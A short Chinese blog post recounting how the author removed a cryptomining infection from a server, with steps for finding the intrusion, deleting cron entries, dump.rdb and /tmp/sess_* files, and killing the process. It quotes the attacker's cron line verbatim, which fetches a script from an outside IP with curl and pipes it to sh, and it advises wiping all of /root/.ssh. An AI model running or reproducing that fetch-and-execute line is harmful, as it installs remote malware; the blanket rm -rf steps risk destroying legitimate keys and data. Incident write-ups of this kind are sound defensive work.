先是在服务器出现警告,说可能是挖矿的病毒。刚开始没当回事,当把这个病毒百度之后发现,很严重呐。
好了,开始干活。
第一步:
链接地址 :https://blog.csdn.net/weixin_41228949/article/details/81501753
然鹅,没有成功。。。。。。(成功了大概半分钟,之后又活了)呵呵呵
第二步:
找出入侵IP
/var/spool/cron/crontabs
*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
curl -fsSL http://149.56.106.215:8000/i.sh
第三步:
将/root/.ssh/所有文件干掉(不认识或者看着不爽的,具体自己判断,我是全都干掉,心情不好。。。。。。)
第四步:继续干掉root文件和dump.rdb文件
rm –rf /var/spool/cron/root
/var/spool/cron/crontabs/root
rm –rf /tmp/dump.rdb
rm –rf /usr/local/redis/bin/ dump.rdb
rm –rf /var/spool/cron/ dump.rdb
第五步:在继续干掉sess开头文件(我这有16个,心情不好都删了。。。。。。)
rm –rf /tmp/sess_* (共有16个file) <内容均为visit_item_1|i:1;>
第六步:
最后在kill -9 xxx 这个病毒以及删除它。
不过我还是把这个IP加入了黑名单。
到此就结束。。。。。。
多说一句,我两台服务器被搞了,看个人运气吧总体来说,不过还有一个链接还是很不错的,在这里找到的灵感。(其实感觉是“模仿”的,哈哈)。
最后贴出链接:https://blog.csdn.net/zhanghan18333611647/article/details/65632827
=========================我是分割线=============================================
这是第一次清除此病毒,半月之后又出现此问题,流氓
再次贴出第二次清除经历:::::https://blog.csdn.net/qq_39424981/article/details/82461129